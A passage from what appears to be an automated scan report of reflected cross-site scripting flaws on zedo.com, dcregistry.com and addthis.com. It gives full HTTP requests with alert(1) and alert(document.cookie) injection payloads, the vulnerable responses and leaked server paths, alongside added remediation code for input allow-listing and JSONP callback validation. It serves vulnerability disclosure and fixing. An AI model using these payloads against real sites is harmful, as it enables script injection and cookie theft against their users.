GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=35817"%3balert(1)//c76b7e8cf54&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:35817";alert(1)//c76b7e8cf54;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=534
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:52 GMT
Connection: close
Content-Length: 2038

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',35817";alert(1)//c76b7e8cf54';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,35817";alert(1)//c76b7e8cf54;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7468b'%3balert(1)//803ecb61dff was submitted in the $ parameter. This input was echoed as 7468b';alert(1)//803ecb61dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=7468b'%3balert(1)//803ecb61dff&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:7468b';alert(1)//803ecb61dff;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:53 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:53 GMT
Connection: close
Content-Length: 2038

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',7468b';alert(1)//803ecb61dff';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7468b';alert(1)//803ecb61dff;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.20. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb90e'-alert(1)-'40d04a4f8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?fb90e'-alert(1)-'40d04a4f8f9=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 942
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:50 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=fb90e'-alert(1)-'40d04a4f8f9=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.21. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e4b"%3balert(1)//9f07af1dcbc was submitted in the q parameter. This input was echoed as 69e4b";alert(1)//9f07af1dcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=69e4b"%3balert(1)//9f07af1dcbc&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:49 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Wed, 19 Jan 2011 18:01:37 GMT
Date: Wed, 19 Jan 2011 18:00:49 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='69e4b";alert(1)//9f07af1dcbc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=69e4b";alert(1)//9f07af1dcbc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.22. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59624'%3balert(1)//65aac50a934 was submitted in the q parameter. This input was echoed as 59624';alert(1)//65aac50a934 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=59624'%3balert(1)//65aac50a934&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:50 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=47
Expires: Wed, 19 Jan 2011 18:01:37 GMT
Date: Wed, 19 Jan 2011 18:00:50 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='59624';alert(1)//65aac50a934';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=59624';alert(1)//65aac50a934;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.23. http://dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload bc39f<script>alert(1)</script>6e8f0f5d54e was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
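In this finding and in 4.24 through 4.26 below, the reflection point is an error message in an HTML body, and the responses show that the same parameter value is also being used as a path component on the server (`db/<value>.db`, `language/<value>/template.pl`, `websites/<value>.cfg`) and that the error text discloses the absolute filesystem path. The right fix therefore constrains the value before it reaches either the filesystem or the page, and HTML-encodes whatever is echoed. The block below is an added example, not dcregistry's CGI code, written in JavaScript to match the other examples on this page. The allow-list pattern is an assumption about what a database name looks like; allowlistName, htmlEscape and renderMissingDbError are the example's own names.

```javascript
// Added example (not dcregistry's code): constrain a parameter that names a
// server-side file, and HTML-encode anything that is echoed into an error page.

// Assumption: database/config names are short identifiers. Rejecting anything
// else up front keeps "<", "/", ".." and quotes away from both the filesystem
// lookup and the response body.
const NAME_RE = /^[A-Za-z0-9_]{1,32}$/;

// Returns the name if acceptable, otherwise null.
function allowlistName(raw) {
  return typeof raw === "string" && NAME_RE.test(raw) ? raw : null;
}

// Encode the five characters that matter in HTML text and attribute contexts.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Builds the error page. A rejected name produces a generic message and never
// appears in the markup; an accepted name is still HTML-encoded on the way out
// (defence in depth), and the server-side path is not disclosed.
function renderMissingDbError(dbParam) {
  const name = allowlistName(dbParam);
  if (name === null) {
    return "<p>We're sorry, but the requested database name is not valid.</p>";
  }
  return "<p>We're sorry, but the database " + htmlEscape(name) + " could not be opened.</p>";
}

// Payload copied verbatim from finding 4.23 above.
const DB_PAYLOAD = "personalsbc39f<script>alert(1)</script>6e8f0f5d54e";
```

Checking the response for the scanner's marker is the same test the report applies: the payload must not appear verbatim in the body. With the allow-list in place it cannot, because the value is dropped before rendering; htmlEscape covers any other place where a user-supplied string legitimately has to be shown.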

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=personalsbc39f<script>alert(1)</script>6e8f0f5d54e HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:43 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 532

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/personalsbc39f<script>alert(1)</script>6e8f0f5d54e.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s
...[SNIP]...

4.24. http://dcregistry.com/cgi-bin/surveys/survey.cgi [db parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload fe27a<script>alert(1)</script>35aefdde02f was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_lookfe27a<script>alert(1)</script>35aefdde02f&website=&language=&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:36 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 517

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/db/aad_lookfe27a<script>alert(1)</script>35aefdde02f.db at line 206 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a syntax
...[SNIP]...

4.25. http://dcregistry.com/cgi-bin/surveys/survey.cgi [language parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the language request parameter is copied into the HTML document as plain text between tags. The payload 5027a<script>alert(1)</script>12f2a4bf5c6 was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=5027a<script>alert(1)</script>12f2a4bf5c6&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:41 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 531

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/language/5027a<script>alert(1)</script>12f2a4bf5c6/template.pl at line 174 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that
...[SNIP]...

4.26. http://dcregistry.com/cgi-bin/surveys/survey.cgi [website parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the website request parameter is copied into the HTML document as plain text between tags. The payload 39b59<script>alert(1)</script>d0e2bc9f57e was submitted in the website parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=39b59<script>alert(1)</script>d0e2bc9f57e&language=&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:40 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 515

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/websites/39b59<script>alert(1)</script>d0e2bc9f57e.cfg at line 441 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a synta
...[SNIP]...

4.27. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csmonitor.com/p.json

Issue detail

The value of the callback request parameter is copied unmodified into the response body, where it is used as the JSONP callback name placed directly before the (...) call. The payload 17c72<script>alert(1)</script>aed7ed93f68 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

Note that the response is served with Content-Type text/javascript rather than text/html, so the <script> tag in this proof of concept only executes where the client renders the response as an HTML document (for example through content-type sniffing). In a script context the unvalidated callback name is itself the injection point, since whatever is supplied is evaluated as the expression that receives the JSON argument.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
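The fix for a reflected JSONP callback is not output encoding, because the callback name is supposed to be code: it is to allow-list the name as a dotted chain of JavaScript identifiers and to serve the script with headers that prevent it being interpreted as anything else. The block below is an added example, not AddThis code; it assumes a fallback callback name of "callback" when validation fails, and the names safeCallbackName, renderJsonp and deliveredData are the example's own.

```javascript
// Added example (not AddThis code): validate a JSONP callback name before
// echoing it, and return headers that stop browsers treating the script as HTML.

// A callback must be a dotted chain of JavaScript identifiers such as
// "_ate.ad.hpr". Anything containing "<", "(", quotes or whitespace fails.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}(\.[A-Za-z_$][\w$]{0,63}){0,7}$/;

// Assumption: an invalid name falls back to a fixed one rather than erroring,
// so a broken embed degrades to a harmless no-op call.
function safeCallbackName(raw, fallback) {
  return typeof raw === "string" && CALLBACK_RE.test(raw) ? raw : fallback;
}

// Build the JSONP response. The leading "/**/" is the usual defence against the
// response being repurposed as a crafted file via the callback (Rosetta Flash
// style), JSON.stringify guarantees the argument is a literal rather than code,
// and nosniff stops a browser from rendering the script as HTML.
function renderJsonp(callbackParam, data) {
  const cb = safeCallbackName(callbackParam, "callback");
  return {
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: "/**/" + cb + "(" + JSON.stringify(data) + ");",
  };
}

// Test harness: run a rendered body with the named (non-dotted) callback bound
// to a recorder and return what it was called with.
function deliveredData(body, callbackName) {
  let received;
  new Function(callbackName, body)(function (d) { received = d; });
  return received;
}

// Payload copied verbatim from finding 4.27 above, and a constructed data object
// shaped like the p.json response.
const CALLBACK_PAYLOAD = "_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68";
const SAMPLE_DATA = { urls: [], segments: ["19F"], loc: "constructed" };
```

With the payload above the name fails the pattern and the body becomes `/**/callback({...});`, so the marker never reaches the response. A legitimate name such as `_ate.ad.hpr` passes unchanged.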

Request

